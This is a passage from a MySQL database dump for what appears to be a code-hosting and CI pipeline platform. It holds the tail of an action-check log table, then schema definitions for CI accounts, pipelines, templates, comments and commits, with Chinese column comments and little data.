08:50:04'),(38,46,'passed','2020-08-10 08:52:14',309,'Memo','2020-08-10 08:52:14','2020-08-10 08:52:14'),(39,46,'passed','2020-08-10 08:52:15',308,'Memo','2020-08-10 08:52:15','2020-08-10 08:52:15'),(40,46,'passed','2020-08-10 08:54:21',310,'Memo','2020-08-10 08:54:21','2020-08-10 08:54:21'),(41,46,'passed','2020-08-10 08:57:44',311,'Memo','2020-08-10 08:57:44','2020-08-10 08:57:44'),(42,1,'passed','2020-08-10 09:25:39',317,'Memo','2020-08-10 09:25:39','2020-08-10 09:25:39'),(43,46,'passed','2020-08-10 14:39:17',318,'Memo','2020-08-10 14:39:17','2020-08-10 14:39:17'),(44,46,'passed','2020-08-10 14:39:21',314,'Memo','2020-08-10 14:39:21','2020-08-10 14:39:21'),(45,46,'refuse','2020-08-10 14:39:24',314,'Memo','2020-08-10 14:39:24','2020-08-10 14:39:24'),(46,1,'passed','2020-08-11 09:29:54',325,'Memo','2020-08-11 09:29:54','2020-08-11 09:29:54'),(47,1,'passed','2020-08-11 09:29:54',324,'Memo','2020-08-11 09:29:54','2020-08-11 09:29:54'),(48,1,'passed','2020-08-11 09:29:55',323,'Memo','2020-08-11 09:29:55','2020-08-11 09:29:55'),(49,1,'passed','2020-08-11 09:29:59',322,'Memo','2020-08-11 09:29:59','2020-08-11 09:29:59'),(50,1,'passed','2020-08-11 09:30:03',321,'Memo','2020-08-11 09:30:03','2020-08-11 09:30:03'),(51,1,'passed','2020-08-11 09:30:03',320,'Memo','2020-08-11 09:30:03','2020-08-11 09:30:03'),(52,1,'passed','2020-08-12 15:53:15',329,'Memo','2020-08-12 15:53:15','2020-08-12 15:53:15'),(53,1,'passed','2020-08-12 16:08:15',333,'Memo','2020-08-12 16:08:15','2020-08-12 16:08:15'),(54,1,'passed','2020-08-12 16:08:16',332,'Memo','2020-08-12 16:08:16','2020-08-12 16:08:16'),(55,1,'passed','2020-08-12 16:08:16',331,'Memo','2020-08-12 16:08:16','2020-08-12 16:08:16'),(56,1,'passed','2020-08-12 16:08:17',330,'Memo','2020-08-12 16:08:17','2020-08-12 16:08:17'),(57,1,'passed','2020-08-12 16:08:18',328,'Memo','2020-08-12 16:08:18','2020-08-12 16:08:18'),(58,46,'passed','2020-08-14 16:07:11',334,'Memo','2020-08-14 16:07:11','2020-08-14 16:07:11'),(59,1,'passed','2020-08-18 08:56:29',337,'Memo','2020-08-18 08:56:29','2020-08-18 08:56:29'),(60,1,'passed','2020-08-18 08:56:51',241,'Memo','2020-08-18 08:56:51','2020-08-18 08:56:51'),(61,1,'passed','2020-08-18 08:56:52',240,'Memo','2020-08-18 08:56:52','2020-08-18 08:56:52'),(62,1,'passed','2020-08-18 08:56:52',239,'Memo','2020-08-18 08:56:52','2020-08-18 08:56:52'),(63,1,'passed','2020-08-18 08:56:53',236,'Memo','2020-08-18 08:56:53','2020-08-18 08:56:53'),(64,1,'passed','2020-08-18 08:56:54',235,'Memo','2020-08-18 08:56:54','2020-08-18 08:56:54'),(65,1,'passed','2020-08-18 08:56:54',234,'Memo','2020-08-18 08:56:54','2020-08-18 08:56:54'),(66,1,'passed','2020-08-18 08:56:55',233,'Memo','2020-08-18 08:56:55','2020-08-18 08:56:55'),(67,1,'passed','2020-08-18 08:56:56',232,'Memo','2020-08-18 08:56:56','2020-08-18 08:56:56'),(68,1,'passed','2020-08-18 08:56:57',230,'Memo','2020-08-18 08:56:57','2020-08-18 08:56:57'),(69,1,'refuse','2020-08-18 08:58:38',241,'Memo','2020-08-18 08:58:38','2020-08-18 08:58:38'),(70,1,'refuse','2020-08-18 08:58:38',241,'Memo','2020-08-18 08:58:38','2020-08-18 08:58:38'),(71,1,'refuse','2020-08-18 08:58:38',241,'Memo','2020-08-18 08:58:38','2020-08-18 08:58:38'),(72,1,'refuse','2020-08-18 08:58:38',241,'Memo','2020-08-18 08:58:38','2020-08-18 08:58:38'),(73,1,'passed','2020-08-18 08:58:43',241,'Memo','2020-08-18 08:58:43','2020-08-18 08:58:43'),(74,1,'passed','2020-08-18 08:58:43',241,'Memo','2020-08-18 08:58:43','2020-08-18 08:58:43'),(75,1,'passed','2020-08-18 08:58:43',241,'Memo','2020-08-18 08:58:43','2020-08-18 08:58:43'),(76,1,'passed','2020-08-18 08:58:43',241,'Memo','2020-08-18 08:58:43','2020-08-18 08:58:43'),(77,1,'passed','2020-08-18 08:58:43',241,'Memo','2020-08-18 08:58:43','2020-08-18 08:58:43'),(78,1,'passed','2020-08-18 08:58:43',241,'Memo','2020-08-18 08:58:43','2020-08-18 08:58:43'),(79,1,'passed','2020-08-18 08:58:43',241,'Memo','2020-08-18 08:58:43','2020-08-18 08:58:43'),(80,1,'passed','2020-08-18 08:59:10',338,'Memo','2020-08-18 08:59:10','2020-08-18 08:59:10'),(81,1,'passed','2020-08-18 08:59:10',338,'Memo','2020-08-18 08:59:10','2020-08-18 08:59:10'),(82,1,'passed','2020-08-18 08:59:10',336,'Memo','2020-08-18 08:59:10','2020-08-18 08:59:10'),(83,1,'passed','2020-08-18 08:59:10',336,'Memo','2020-08-18 08:59:10','2020-08-18 08:59:10'),(84,1,'passed','2020-08-18 08:59:11',335,'Memo','2020-08-18 08:59:11','2020-08-18 08:59:11'),(85,1,'passed','2020-08-18 08:59:11',335,'Memo','2020-08-18 08:59:11','2020-08-18 08:59:11'),(86,1,'passed','2020-08-18 08:59:12',26,'Memo','2020-08-18 08:59:12','2020-08-18 08:59:12'),(87,1,'passed','2020-08-18 08:59:12',26,'Memo','2020-08-18 08:59:12','2020-08-18 08:59:12'),(88,1,'passed','2020-08-18 09:23:20',339,'Memo','2020-08-18 09:23:20','2020-08-18 09:23:20'),(89,1,'passed','2020-08-18 10:11:11',340,'Memo','2020-08-18 10:11:11','2020-08-18 10:11:11'),(90,47,'passed','2020-08-18 18:28:19',341,'Memo','2020-08-18 18:28:19','2020-08-18 18:28:19'),(91,1,'passed','2020-08-21 09:28:26',343,'Memo','2020-08-21 09:28:26','2020-08-21 09:28:26'),(92,1,'passed','2020-08-21 09:28:26',343,'Memo','2020-08-21 09:28:26','2020-08-21 09:28:26'),(93,1,'passed','2020-08-21 09:28:26',343,'Memo','2020-08-21 09:28:26','2020-08-21 09:28:26'),(94,1,'passed','2020-08-21 09:28:26',343,'Memo','2020-08-21 09:28:26','2020-08-21 09:28:26'),(95,1,'passed','2020-08-21 09:28:36',345,'Memo','2020-08-21 09:28:36','2020-08-21 09:28:36'),(96,1,'passed','2020-08-21 09:28:37',344,'Memo','2020-08-21 09:28:37','2020-08-21 09:28:37'),(97,1,'passed','2020-08-21 10:10:17',346,'Memo','2020-08-21 10:10:17','2020-08-21 10:10:17'),(98,1,'passed','2020-08-21 10:10:17',346,'Memo','2020-08-21 10:10:17','2020-08-21 10:10:17'),(99,46,'passed','2020-08-24 15:18:47',348,'Memo','2020-08-24 15:18:47','2020-08-24 15:18:47'),(100,46,'passed','2020-08-24 15:54:26',350,'Memo','2020-08-24 15:54:26','2020-08-24 15:54:26'),(101,46,'passed','2020-08-25 15:01:41',351,'Memo','2020-08-25 15:01:41','2020-08-25 15:01:41'),(102,46,'refuse','2020-08-25 15:01:44',351,'Memo','2020-08-25 15:01:44','2020-08-25 15:01:44'),(103,46,'passed','2020-08-25 15:01:45',351,'Memo','2020-08-25 15:01:45','2020-08-25 15:01:45'),(104,46,'refuse','2020-08-25 15:01:48',351,'Memo','2020-08-25 15:01:48','2020-08-25 15:01:48'),(105,1,'refuse','2020-10-13 15:11:09',350,'Memo','2020-10-13 15:11:09','2020-10-13 15:11:09'),(106,1,'refuse','2020-10-13 15:11:09',350,'Memo','2020-10-13 15:11:09','2020-10-13 15:11:09'),(107,1,'refuse','2020-10-13 15:11:09',350,'Memo','2020-10-13 15:11:09','2020-10-13 15:11:09'),(108,1,'refuse','2020-10-13 15:11:09',350,'Memo','2020-10-13 15:11:09','2020-10-13 15:11:09'),(109,1,'passed','2021-01-08 18:52:10',365,'Memo','2021-01-08 18:52:10','2021-01-08 18:52:10'),(110,1,'passed','2021-01-08 18:52:11',364,'Memo','2021-01-08 18:52:11','2021-01-08 18:52:11'),(111,1,'passed','2021-01-08 18:52:11',363,'Memo','2021-01-08 18:52:11','2021-01-08 18:52:11'),(112,1,'passed','2021-01-08 18:52:12',350,'Memo','2021-01-08 18:52:12','2021-01-08 18:52:12'),(113,1,'refuse','2021-01-27 15:23:01',365,'Memo','2021-01-27 15:23:01','2021-01-27 15:23:01'),(114,1,'refuse','2021-01-27 15:23:02',364,'Memo','2021-01-27 15:23:02','2021-01-27 15:23:02'),(115,1,'refuse','2021-01-27 15:23:02',363,'Memo','2021-01-27 15:23:02','2021-01-27 15:23:02'),(116,1,'refuse','2021-01-27 15:23:04',350,'Memo','2021-01-27 15:23:04','2021-01-27 15:23:04'),(117,1,'refuse','2021-01-27 15:43:18',343,'Memo','2021-01-27 15:43:18','2021-01-27 15:43:18'),(118,1,'refuse','2021-01-27 15:43:19',337,'Memo','2021-01-27 15:43:19','2021-01-27 15:43:19'),(119,1,'refuse','2021-01-27 15:43:19',343,'Memo','2021-01-27 15:43:19','2021-01-27 15:43:19'),(120,1,'refuse','2021-01-27 15:43:20',337,'Memo','2021-01-27 15:43:20','2021-01-27 15:43:20'),(121,1,'refuse','2021-01-27 15:43:20',241,'Memo','2021-01-27 15:43:20','2021-01-27 15:43:20'),(122,1,'refuse','2021-01-27 15:43:20',241,'Memo','2021-01-27 15:43:20','2021-01-27 15:43:20'),(123,1,'refuse','2021-01-27 15:43:21',240,'Memo','2021-01-27 15:43:21','2021-01-27 15:43:21'),(124,1,'refuse','2021-01-27 15:43:21',240,'Memo','2021-01-27 15:43:21','2021-01-27 15:43:21'),(125,1,'refuse','2021-01-27 15:43:21',239,'Memo','2021-01-27 15:43:21','2021-01-27 15:43:21'),(126,1,'refuse','2021-01-27 15:43:21',239,'Memo','2021-01-27 15:43:21','2021-01-27 15:43:21'),(127,1,'refuse','2021-01-27 15:43:23',236,'Memo','2021-01-27 15:43:23','2021-01-27 15:43:23'),(128,1,'refuse','2021-01-27 15:43:23',236,'Memo','2021-01-27 15:43:23','2021-01-27 15:43:23'),(129,1,'passed','2021-01-27 15:43:32',241,'Memo','2021-01-27 15:43:32','2021-01-27 15:43:32'),(130,1,'passed','2021-01-27 15:43:32',241,'Memo','2021-01-27 15:43:32','2021-01-27 15:43:32'),(131,1,'passed','2021-01-27 15:43:33',240,'Memo','2021-01-27 15:43:33','2021-01-27 15:43:33'),(132,1,'passed','2021-01-27 15:43:33',240,'Memo','2021-01-27 15:43:33','2021-01-27 15:43:33'),(133,1,'passed','2021-01-27 15:44:32',343,'Memo','2021-01-27 15:44:32','2021-01-27 15:44:32'),(134,1,'passed','2021-01-27 15:44:32',343,'Memo','2021-01-27 15:44:32','2021-01-27 15:44:32'),(135,1,'passed','2021-01-27 15:44:33',337,'Memo','2021-01-27 15:44:33','2021-01-27 15:44:33'),(136,1,'passed','2021-01-27 15:44:33',337,'Memo','2021-01-27 15:44:33','2021-01-27 15:44:33'),(137,1,'passed','2021-01-27 15:44:34',239,'Memo','2021-01-27 15:44:34','2021-01-27 15:44:34'),(138,1,'passed','2021-01-27 15:44:34',239,'Memo','2021-01-27 15:44:34','2021-01-27 15:44:34'),(139,1,'passed','2021-01-27 15:44:34',236,'Memo','2021-01-27 15:44:34','2021-01-27 15:44:34'),(140,1,'passed','2021-01-27 15:44:34',236,'Memo','2021-01-27 15:44:34','2021-01-27 15:44:34'),(141,1,'passed','2021-01-27 15:52:43',359,'Memo','2021-01-27 15:52:43','2021-01-27 15:52:43'),(142,1,'passed','2021-01-27 15:52:43',359,'Memo','2021-01-27 15:52:43','2021-01-27 15:52:43'),(143,1,'passed','2021-01-27 15:52:43',359,'Memo','2021-01-27 15:52:43','2021-01-27 15:52:43'),(144,1,'passed','2021-01-27 15:52:43',359,'Memo','2021-01-27 15:52:43','2021-01-27 15:52:43'),(145,1,'passed','2021-01-27 15:52:44',357,'Memo','2021-01-27 15:52:44','2021-01-27 15:52:44'),(146,1,'passed','2021-01-27 15:52:44',357,'Memo','2021-01-27 15:52:44','2021-01-27 15:52:44'),(147,1,'passed','2021-01-27 15:52:44',357,'Memo','2021-01-27 15:52:44','2021-01-27 15:52:44'),(148,1,'passed','2021-01-27 15:52:44',357,'Memo','2021-01-27 15:52:44','2021-01-27 15:52:44'),(149,1,'passed','2021-01-27 15:52:45',356,'Memo','2021-01-27 15:52:45','2021-01-27 15:52:45'),(150,1,'passed','2021-01-27 15:52:45',356,'Memo','2021-01-27 15:52:45','2021-01-27 15:52:45'),(151,1,'passed','2021-01-27 15:52:45',356,'Memo','2021-01-27 15:52:45','2021-01-27 15:52:45'),(152,1,'passed','2021-01-27 15:52:45',356,'Memo','2021-01-27 15:52:45','2021-01-27 15:52:45'),(153,1,'passed','2021-01-27 15:52:48',353,'Memo','2021-01-27 15:52:48','2021-01-27 15:52:48'),(154,1,'passed','2021-01-27 15:52:48',353,'Memo','2021-01-27 15:52:48','2021-01-27 15:52:48'),(155,1,'passed','2021-01-27 15:52:48',353,'Memo','2021-01-27 15:52:48','2021-01-27 15:52:48'),(156,1,'passed','2021-01-27 15:52:48',353,'Memo','2021-01-27 15:52:48','2021-01-27 15:52:48'),(157,1,'passed','2021-01-27 15:52:49',349,'Memo','2021-01-27 15:52:49','2021-01-27 15:52:49'),(158,1,'passed','2021-01-27 15:52:49',349,'Memo','2021-01-27 15:52:49','2021-01-27 15:52:49'),(159,1,'passed','2021-01-27 15:52:49',349,'Memo','2021-01-27 15:52:49','2021-01-27 15:52:49'),(160,1,'passed','2021-01-27 15:52:49',349,'Memo','2021-01-27 15:52:49','2021-01-27 15:52:49'),(161,1,'refuse','2021-01-27 15:52:50',349,'Memo','2021-01-27 15:52:50','2021-01-27 15:52:50'),(162,1,'refuse','2021-01-27 15:52:50',349,'Memo','2021-01-27 15:52:50','2021-01-27 15:52:50'),(163,1,'refuse','2021-01-27 15:52:50',349,'Memo','2021-01-27 15:52:50','2021-01-27 15:52:50'),(164,1,'refuse','2021-01-27 15:52:50',349,'Memo','2021-01-27 15:52:50','2021-01-27 15:52:50'),(165,1,'refuse','2021-01-27 15:52:52',353,'Memo','2021-01-27 15:52:52','2021-01-27 15:52:52'),(166,1,'refuse','2021-01-27 15:52:52',353,'Memo','2021-01-27 15:52:52','2021-01-27 15:52:52'),(167,1,'refuse','2021-01-27 15:52:52',353,'Memo','2021-01-27 15:52:52','2021-01-27 15:52:52'),(168,1,'refuse','2021-01-27 15:52:52',353,'Memo','2021-01-27 15:52:52','2021-01-27 15:52:52'),(169,1,'refuse','2021-01-27 15:52:52',356,'Memo','2021-01-27 15:52:52','2021-01-27 15:52:52'),(170,1,'refuse','2021-01-27 15:52:52',356,'Memo','2021-01-27 15:52:52','2021-01-27 15:52:52'),(171,1,'refuse','2021-01-27 15:52:52',356,'Memo','2021-01-27 15:52:52','2021-01-27 15:52:52'),(172,1,'refuse','2021-01-27 15:52:52',356,'Memo','2021-01-27 15:52:52','2021-01-27 15:52:52'),(173,1,'refuse','2021-01-27 15:52:53',357,'Memo','2021-01-27 15:52:53','2021-01-27 15:52:53'),(174,1,'refuse','2021-01-27 15:52:53',357,'Memo','2021-01-27 15:52:53','2021-01-27 15:52:53'),(175,1,'refuse','2021-01-27 15:52:53',357,'Memo','2021-01-27 15:52:53','2021-01-27 15:52:53'),(176,1,'refuse','2021-01-27 15:52:53',357,'Memo','2021-01-27 15:52:53','2021-01-27 15:52:53'),(177,1,'refuse','2021-01-27 15:52:54',359,'Memo','2021-01-27 15:52:54','2021-01-27 15:52:54'),(178,1,'refuse','2021-01-27 15:52:54',359,'Memo','2021-01-27 15:52:54','2021-01-27 15:52:54'),(179,1,'refuse','2021-01-27 15:52:54',359,'Memo','2021-01-27 15:52:54','2021-01-27 15:52:54'),(180,1,'refuse','2021-01-27 15:52:54',359,'Memo','2021-01-27 15:52:54','2021-01-27 15:52:54'),(181,1,'passed','2021-01-27 15:53:19',359,'Memo','2021-01-27 15:53:19','2021-01-27 15:53:19'),(182,1,'passed','2021-01-27 15:53:19',359,'Memo','2021-01-27 15:53:19','2021-01-27 15:53:19'),(183,1,'passed','2021-01-27 15:53:19',359,'Memo','2021-01-27 15:53:19','2021-01-27 15:53:19'),(184,1,'passed','2021-01-27 15:53:19',359,'Memo','2021-01-27 15:53:19','2021-01-27 15:53:19'),(185,1,'passed','2021-01-27 15:53:19',357,'Memo','2021-01-27 15:53:19','2021-01-27 15:53:19'),(186,1,'passed','2021-01-27 15:53:19',357,'Memo','2021-01-27 15:53:19','2021-01-27 15:53:19'),(187,1,'passed','2021-01-27 15:53:19',357,'Memo','2021-01-27 15:53:19','2021-01-27 15:53:19'),(188,1,'passed','2021-01-27 15:53:19',357,'Memo','2021-01-27 15:53:19','2021-01-27 15:53:19'),(189,1,'passed','2021-01-27 15:53:20',356,'Memo','2021-01-27 15:53:20','2021-01-27 15:53:20'),(190,1,'passed','2021-01-27 15:53:20',356,'Memo','2021-01-27 15:53:20','2021-01-27 15:53:20'),(191,1,'passed','2021-01-27 15:53:20',356,'Memo','2021-01-27 15:53:20','2021-01-27 15:53:20'),(192,1,'passed','2021-01-27 15:53:20',356,'Memo','2021-01-27 15:53:20','2021-01-27 15:53:20'),(193,1,'passed','2021-01-27 15:53:20',353,'Memo','2021-01-27 15:53:20','2021-01-27 15:53:20'),(194,1,'passed','2021-01-27 15:53:20',353,'Memo','2021-01-27 15:53:20','2021-01-27 15:53:20'),(195,1,'passed','2021-01-27 15:53:20',353,'Memo','2021-01-27 15:53:20','2021-01-27 15:53:20'),(196,1,'passed','2021-01-27 15:53:20',353,'Memo','2021-01-27 15:53:20','2021-01-27 15:53:20'),(197,1,'passed','2021-01-27 15:53:21',349,'Memo','2021-01-27 15:53:21','2021-01-27 15:53:21'),(198,1,'passed','2021-01-27 15:53:21',349,'Memo','2021-01-27 15:53:21','2021-01-27 15:53:21'),(199,1,'passed','2021-01-27 15:53:21',349,'Memo','2021-01-27 15:53:21','2021-01-27 15:53:21'),(200,1,'passed','2021-01-27 15:53:21',349,'Memo','2021-01-27 15:53:21','2021-01-27 15:53:21');
|
||
/*!40000 ALTER TABLE `checked_actions` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `ci_cloud_accounts`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `ci_cloud_accounts`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `ci_cloud_accounts` (
|
||
`id` bigint(20) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) NOT NULL,
|
||
`ip_num` int(11) DEFAULT NULL,
|
||
`account` varchar(255) DEFAULT NULL,
|
||
`secret` varchar(255) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`ci_user_id` int(11) DEFAULT NULL,
|
||
`server_type` int(11) DEFAULT '0',
|
||
PRIMARY KEY (`id`),
|
||
KEY `dev_ops_cloud_accounts_p_u_ip` (`user_id`,`ip_num`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `ci_cloud_accounts`
|
||
--
|
||
|
||
LOCK TABLES `ci_cloud_accounts` WRITE;
|
||
/*!40000 ALTER TABLE `ci_cloud_accounts` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `ci_cloud_accounts` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `ci_languages`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `ci_languages`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `ci_languages` (
|
||
`id` bigint(20) NOT NULL AUTO_INCREMENT,
|
||
`name` varchar(255) NOT NULL COMMENT 'The name of project language.',
|
||
`content` text NOT NULL COMMENT 'The content of project language.',
|
||
`usage_amount` int(11) DEFAULT '0' COMMENT 'number of people Using the language',
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`cover_id` int(11) DEFAULT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `ci_languages`
|
||
--
|
||
|
||
LOCK TABLES `ci_languages` WRITE;
|
||
/*!40000 ALTER TABLE `ci_languages` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `ci_languages` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `ci_pipeline_stage_steps`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `ci_pipeline_stage_steps`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `ci_pipeline_stage_steps` (
|
||
`id` bigint(20) NOT NULL AUTO_INCREMENT,
|
||
`step_name` varchar(255) NOT NULL COMMENT '步骤名称',
|
||
`stage_id` int(11) NOT NULL COMMENT '阶段id',
|
||
`template_id` int(11) DEFAULT NULL COMMENT '模板id',
|
||
`content` text,
|
||
`show_index` int(11) NOT NULL DEFAULT '0' COMMENT '阶段排序',
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `ci_pipeline_stage_steps`
|
||
--
|
||
|
||
LOCK TABLES `ci_pipeline_stage_steps` WRITE;
|
||
/*!40000 ALTER TABLE `ci_pipeline_stage_steps` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `ci_pipeline_stage_steps` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `ci_pipeline_stages`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `ci_pipeline_stages`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `ci_pipeline_stages` (
|
||
`id` bigint(20) NOT NULL AUTO_INCREMENT,
|
||
`stage_name` varchar(255) NOT NULL COMMENT '阶段名称',
|
||
`stage_type` varchar(255) NOT NULL COMMENT '阶段类型:init/build/deploy/customize/confirm',
|
||
`pipeline_id` int(11) NOT NULL COMMENT '阶段所属流水线id',
|
||
`show_index` int(11) NOT NULL DEFAULT '0' COMMENT '阶段排序',
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `ci_pipeline_stages`
|
||
--
|
||
|
||
LOCK TABLES `ci_pipeline_stages` WRITE;
|
||
/*!40000 ALTER TABLE `ci_pipeline_stages` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `ci_pipeline_stages` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `ci_pipelines`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `ci_pipelines`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `ci_pipelines` (
|
||
`id` bigint(20) NOT NULL AUTO_INCREMENT,
|
||
`pipeline_name` varchar(255) NOT NULL COMMENT '流水线名称',
|
||
`pipeline_status` varchar(255) NOT NULL DEFAULT 'unknown' COMMENT 'successed/failed/running/errored/pending/killed/unknown',
|
||
`file_name` varchar(255) NOT NULL COMMENT '文件名称',
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`login` varchar(255) DEFAULT NULL,
|
||
`sync` int(11) NOT NULL DEFAULT '0' COMMENT '0 未同步到gitea,1 已同步',
|
||
`identifier` varchar(255) DEFAULT NULL,
|
||
`branch` varchar(255) DEFAULT NULL,
|
||
`event` varchar(255) DEFAULT NULL,
|
||
`sha` varchar(255) DEFAULT NULL,
|
||
`owner` varchar(255) DEFAULT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `ci_pipelines`
|
||
--
|
||
|
||
LOCK TABLES `ci_pipelines` WRITE;
|
||
/*!40000 ALTER TABLE `ci_pipelines` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `ci_pipelines` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `ci_templates`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `ci_templates`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `ci_templates` (
|
||
`id` bigint(20) NOT NULL AUTO_INCREMENT,
|
||
`template_name` varchar(255) NOT NULL COMMENT '模板名称',
|
||
`stage_type` varchar(255) NOT NULL COMMENT '模板所属阶段类型:init/build/deploy/customize/confirm',
|
||
`category` varchar(255) NOT NULL COMMENT '模板分类',
|
||
`content` text NOT NULL COMMENT '模板yml内容',
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`parent_category` varchar(255) DEFAULT NULL,
|
||
`login` varchar(255) DEFAULT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_ci_templates_on_stage_type` (`stage_type`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `ci_templates`
|
||
--
|
||
|
||
LOCK TABLES `ci_templates` WRITE;
|
||
/*!40000 ALTER TABLE `ci_templates` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `ci_templates` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `comments`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `comments`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `comments` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`commented_type` varchar(30) NOT NULL DEFAULT '',
|
||
`commented_id` int(11) NOT NULL DEFAULT '0',
|
||
`author_id` int(11) NOT NULL DEFAULT '0',
|
||
`comments` text,
|
||
`created_on` datetime NOT NULL,
|
||
`updated_on` datetime NOT NULL,
|
||
`parent_id` int(11) DEFAULT NULL,
|
||
`comments_count` int(11) DEFAULT '0',
|
||
`reply_id` int(11) DEFAULT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_comments_on_commented_id_and_commented_type` (`commented_id`,`commented_type`),
|
||
KEY `index_comments_on_author_id` (`author_id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `comments`
|
||
--
|
||
|
||
LOCK TABLES `comments` WRITE;
|
||
/*!40000 ALTER TABLE `comments` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `comments` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `commit_issues`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `commit_issues`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `commit_issues` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`commit_id` varchar(255) DEFAULT NULL,
|
||
`issue_id` int(11) DEFAULT NULL,
|
||
`project_id` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `commit_issues`
|
||
--
|
||
|
||
LOCK TABLES `commit_issues` WRITE;
|
||
/*!40000 ALTER TABLE `commit_issues` DISABLE KEYS */;
|
||
INSERT INTO `commit_issues` VALUES (1,'cd7095ec',42,101,'2019-01-22 09:19:47','2019-01-22 09:19:47'),(2,'ee1785d0',111,251,'2020-02-04 22:00:33','2020-02-04 22:00:33');
|
||
/*!40000 ALTER TABLE `commit_issues` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `commits`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `commits`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `commits` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`repository_id` int(11) DEFAULT NULL,
|
||
`version` varchar(255) DEFAULT NULL,
|
||
`committer` varchar(255) DEFAULT NULL,
|
||
`comments` text,
|
||
`committed_on` datetime DEFAULT NULL,
|
||
`project_id` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`)
|
||
